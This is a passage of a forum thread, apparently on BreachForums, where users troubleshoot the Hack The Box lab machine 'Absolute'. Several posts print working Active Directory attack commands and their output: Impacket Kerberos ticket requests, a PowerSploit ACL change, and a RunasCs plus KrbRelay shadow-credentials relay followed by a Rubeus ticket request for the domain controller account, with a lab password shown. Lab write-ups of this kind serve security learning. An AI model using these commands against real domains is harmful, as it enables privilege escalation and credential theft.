Return to forum
Absolute - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
Member
Member
Posts: 22
Threads: 0
Joined: N/A
Reputation: 1

#91
September 29, 2022 at 9:47 AM
(September 29, 2022, 08:57 AM)Exa Wrote: I'm also getting "The user name or password is incorrect" error when running the Add-DomainObjectAcl command.


What I did:
  • I setup a new Windows 10 Pro VM.
  • I downloaded and imported Powersploit via Import-Module .\PowerSploit.psm1.
  • I set internet time to dc.absolute.htb.
  • I removed dc.absolute.htb from the hosts file. Doing so, the error changes to "The server is not operational"
Any ideas?


Had the same issue on my commando vm. I added the DC IP to my DNS Servers in the network card settings
Reply
BreachForums User
VIP
Posts: 213
Threads: 0
Joined: N/A
Reputation: 56

#92
September 29, 2022 at 11:29 AM
(September 29, 2022, 09:47 AM)ThatUsername Wrote:
(September 29, 2022, 08:57 AM)Exa Wrote: I'm also getting "The user name or password is incorrect" error when running the Add-DomainObjectAcl command.


What I did:
  • I setup a new Windows 10 Pro VM.
  • I downloaded and imported Powersploit via Import-Module .\PowerSploit.psm1.
  • I set internet time to dc.absolute.htb.
  • I removed dc.absolute.htb from the hosts file. Doing so, the error changes to "The server is not operational"
Any ideas?


Had the same issue on my commando vm. I added the DC IP to my DNS Servers in the network card settings


Thanks, that worked.
Reply
Member
Member
Posts: 22
Threads: 0
Joined: N/A
Reputation: 1

#93
September 29, 2022 at 11:45 AM
(September 28, 2022, 01:42 PM)Hacker2222 Wrote:
(September 28, 2022, 01:36 PM)Exa Wrote:
(September 28, 2022, 12:41 PM)Photographer Wrote:
(September 27, 2022, 05:57 PM)Exa Wrote:
(September 27, 2022, 06:43 AM)Exa Wrote: I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).

These are the commands I used:

sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb


Does anyone has an idea why this is happening?


Finally got this working. Apparently, dc.absolute.htb must be set as target (instead of absolute.htb or the IP address):

smbclient.py -k dc.absolute.htb


ok that fixed it for me too!!! thanks


Nice to hear. The lesson learnt is to use FQDNs when dealing with Kerberos tickets. This is the article I came across when troubleshooting: https://www.onsecurity.io/blog/abusing-kerberos-from-linux/


JAJAJAJA kerbersos hates ips LOL u always have to use domains with kerberos. at least microsoft kerberos


I´m a baby step away from root. But the tools that should work won´t do the job :D
Reply
Member
Member
Posts: 22
Threads: 0
Joined: N/A
Reputation: 1

#94
September 29, 2022 at 12:37 PM
Sure,on my WinRM Session i uploaded these files[hide]https://github.com/cube0x0/KrbRelayhttps://github.com/antonioCoco/RunasCshttps://github.com/GhostPack/Rubeus/[/hide]The i tried to abuse shadow credentials again with the command:[hide]./runascs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\users\winrm_user\documents\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred"[/hide]It presents me the successful output which i can use. [*]Relaying context: absolute.htb\DC$[*]Rewriting function table[*]Rewriting PEB[*]GetModuleFileName: System[*]Init com server[*]GetModuleFileName: C:\users\winrm_user\documents\KrbRelay.exe[*]Register com serverobjref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAC02bxMxvj+ZK5wyYd+tqS6AoQAANQC///Uv7nn/Sb4xSIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:[*]Forcing SYSTEM authentication[*]Using CLSID: 752073a1-23f2-4396-85f0-8fdb879ed0ed[*]apReq: 608206b406092a864886f7120102b4067f59cf8dc3e6d494822c9b9[*]bind: 0[*]ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS[*]apRep1: 6f8188308185a0e458b6a437b61a2484[*]AcceptSecurityContext: SEC_I_CONTINUE_NEEDED[*]fContextReq: Delegate, MutualAuth, UseDceStyle, Connection[*]apRep2: 6f5b3059a003020105a10302010d6d6dec624fa79d20484a56b9df2a60fd2c6797302923[*]bind: 0[*]ldap_get_option: LDAP_SUCCESS[+] LDAP session established[*]ldap_modify: LDAP_SUCCESS[*]Rubeus.exe asktgt /user: DC$ /certificate: DATABLOB /password:"f1459c1a-f9de-419d-a074-85e22b327fdb" /getcredentials /showBut the second step fails.[hide]./Rubeus.exe asktgt /user: DC$ /certificate: DATABLOB /password:"f1459c1a-f9de-419d-a074-85e22b327fdb" /getcredentials /show ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.6.1[*]Action: Ask TGT[!] Failed to find certificate for MIIJsAIBAzCCCWwGCSqGSIb3DQEHAaCCCV.....[/hide]By using an additional argument it fails too[hide]./runascs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\users\winrm_user\documents\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred -ntlm"[*]Relaying context: absolute.htb\DC$[*]Rewriting function table[*]Rewriting PEB[*]GetModuleFileName: System[*]Init com server[*]GetModuleFileName: C:\users\winrm_user\documents\KrbRelay.exe[*]Register com serverobjref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAABNYcMj1VSE/4zbzVAM+HFyAlAAALwS///+EbEb5HpRmCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:[*]Forcing SYSTEM authentication[*]Using CLSID: 752073a1-23f2-4396-85f0-8fdb879ed0ed[*]NTLM14e544c4d535350000100000007b218a2080008002a00000002000200280000000a0063450000000f44434142534f4c555445[*]AcceptSecurityContext: SEC_I_CONTINUE_NEEDED[*]fContextReq: Delegate, MutualAuth, UseDceStyle, Connection, AllowNonUserLogonsSystem.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)) at KrbRelay.Ole32.CoGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsid, Object pUnkOuter, CLSCTX dwClsCtx, IStorage pstg, UInt32 cmq, MULTI_QI[] rgmqResults) at KrbRelay.Program.Main(String[] args)[/hide]
Reply
Banned
Posts: 33
Threads: 0
Joined: N/A
Reputation: 0

#95
September 29, 2022 at 1:00 PM
(September 29, 2022, 12:37 PM)ThatUsername Wrote: Sure,

on my WinRM Session i uploaded these files
Reply
Member
Member
Posts: 23
Threads: 0
Joined: N/A
Reputation: 0

#96
September 29, 2022 at 2:25 PM
(September 29, 2022, 12:37 PM)ThatUsername Wrote: Sure,

on my WinRM Session i uploaded these files


How did you find this specificc CLSID? 752073A1-23F2-4396-85F0-8FDB879ED0ED
Reply
Elite User
Elite
Posts: 166
Threads: 0
Joined: N/A
Reputation: 5

#97
September 29, 2022 at 2:52 PM
i think its possible to make from linux with dacledit. py and you don't necessarily need a windows machine for the winrm part.
well I think its not necessary :D
Reply
Member
Member
Posts: 1
Threads: 0
Joined: N/A
Reputation: 0

#98
September 29, 2022 at 3:06 PM
Yeah, I can confirm that you don't need any Windows machine
Reply
Member
Member
Posts: 22
Threads: 0
Joined: N/A
Reputation: 1

#99
September 29, 2022 at 3:34 PM
(September 29, 2022, 02:25 PM)delmerherberth Wrote:
(September 29, 2022, 12:37 PM)ThatUsername Wrote: Sure,

on my WinRM Session i uploaded these files


How did you find this specificc CLSID? 752073A1-23F2-4396-85F0-8FDB879ED0ED


https://notes.vulndev.io/notes/redteam/payloads/windows

(September 29, 2022, 03:06 PM)Cornstalk Wrote: Yeah, I can confirm that you don't need any Windows machine


Then feel free to give me a little hint :)
Reply
Member
Member
Posts: 1
Threads: 0
Joined: N/A
Reputation: 0

#100
September 29, 2022 at 4:39 PM
(September 29, 2022, 12:37 PM)ThatUsername Wrote: Sure,

on my WinRM Session i uploaded these files
Reply


 Users viewing this thread: Absolute - HTB [Discussion]: No users currently viewing.